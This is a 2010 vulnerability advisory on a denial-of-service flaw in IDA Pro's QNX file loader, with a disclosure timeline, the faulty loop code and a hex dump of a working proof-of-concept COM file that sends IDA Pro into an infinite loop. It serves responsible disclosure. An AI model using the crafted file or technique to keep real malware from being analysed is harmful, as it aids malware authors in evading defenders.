|
|
Denial-of-Service Vulnerability in IDA Pro=0D
------------------------------------------=0D
=0D
June 28th, 2010=0D
=0D
========0D
Summary=0D
========0D
Name: Denial-of-Service Vulnerability in IDA Pro=0D
Release Date: June 28th, 2010=0D
Discoverer: Jason Geffner=0D
Version Affected: IDA Pro 3.76 through 5.6=0D
Risk: Low=0D
Status: Published=0D
=0D
=============0D
Introduction=0D
=============0D
This paper discusses how a binary file could be crafted to cause IDA Pro to=0D
consume 100% of CPU resources while trying to analyze it, thus preventing=0D
disassembling. While this vulnerability is in the QNX file loader, a functional=0D
COM file could be crafted to masquerade as a QNX file and trigger this issue.=0D
This vulnerability was responsibly disclosed to IDA Pro's support personnel and=0D
this advisory was not released until a fixed build was publicly released.=0D
=0D
===========0D
Background=0D
===========0D
"The IDA Pro Disassembler and Debugger is an interactive, programmable,=0D
extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.=0D
IDA Pro has become the de-facto standard for the analysis of hostile code,=0D
vulnerability research and COTS validation." [1]=0D
=0D
=========0D
Timeline=0D
=========0D
07/28/98 IDA Pro loader for QNX files written=0D
12/31/09 Denial-of-service vulnerability discovered in IDA Pro loader for QNX=0D
files=0D
12/31/09 Detailed vulnerability report responsibly disclosed to IDA Pro's=0D
support personnel=0D
01/04/10 Response received from IDA Pro's support personnel, confirming=0D
vulnerability=0D
06/25/10 IDA Pro 5.7 released, fixing vulnerability=0D
06/28/10 Advisory released=0D
=0D
==============0D
Vulnerability=0D
==============0D
IDA Pro uses different file loaders to disassemble files of different formats=0D
(PE, ELF, etc.). The loader for QNX files contains a vulnerability that allows=0D
a specially crafted file to cause the loader to go into an infinite loop,=0D
thereby consuming 100% of CPU resources and preventing disassembly.=0D
=0D
The for-loop below is designed to iterate through each lmf_data structure in=0D
the input file, advancing the file pointer based on sizeof(lmf_data) +=0D
lmf_data.offset). However, if lmf_data.offset == -sizeof(lmf_data) then at is=0D
never increased and this code will run in an infinite loop.=0D
=0D
>From \ldr\qnx\qnx.cpp(50):=0D
for(uint32 at = sizeof(ex.lmf_header)+ex.lmf_header.data_nbytes;=0D
lmf_data.segment_index != _LMF_EOF_REC;=0D
at += sizeof(lmf_data) + lmf_data.offset)=0D
{=0D
qlseek( li, at, 0 );=0D
if ( sizeof(_lmf_data) !==0D
qlread( li, &lmf_data, sizeof(_lmf_data) ) ) return 0;=0D
switch(lmf_data.segment_index)=0D
{=0D
...=0D
case _LMF_COMMENT_REC:=0D
break;=0D
...=0D
}=0D
}=0D
=0D
========0D
Exploit=0D
========0D
While this vulnerability is in the QNX file loader, a functional COM file could=0D
be crafted to masquerade as a QNX file and trigger this issue. As such, it=0D
would be possible for a malware author to create a working malicious COM=0D
program, craft it to appear as a QNX file to IDA Pro, and thus prevent IDA Pro=0D
from being able to disassemble it. Windows 7 will correctly run such a COM=0D
program even if it is named with a .EXE extension.=0D
=0D
See below for a proof-of-concept COM file. When run from a command-prompt, this=0D
program will print, "I can't be opened in IDA Pro :)". When opened in IDA Pro,=0D
it will cause IDA Pro to spin in an infinite loop.=0D
=0D
00000000: 00 00 34 00 00 00 b4 09 eb 02 82 01 ba 13 01 cd ..4.............=0D
00000010: 21 cd 20 49 20 63 61 6e 27 74 20 62 65 20 6f 70 !. I can't be op=0D
00000020: 65 6e 65 64 20 69 6e 20 49 44 41 20 50 72 6f 20 ened in IDA Pro =0D
00000030: 3a 29 24 00 00 00 00 00 00 00 01 00 fa ff ff ff :)$.............=0D
00000040: 00 00 00 00 00 00 ......=0D
=0D
===========0D
Conclusion=0D
===========0D
In-depth code reviews and fuzzing should be performed on all software,=0D
especially when the software is designed for analyzing malicious and/or=0D
untrusted data.=0D
=0D
================0D
Fix Information=0D
================0D
This issue has now been resolved. IDA Pro 5.7 can be downloaded from=0D
https://www.hex-rays.com/updida.shtml=0D
=0D
===========0D
References=0D
===========0D
[1] http://hex-rays.com/idapro/overview.htm=0D
=0D
NGSSoftware Insight Security Research=0D
http://www.ngssoftware.com/=0D
http://www.databasesecurity.com/=0D
http://www.nextgenss.com/=0D
+44(0)208 401 0070=0D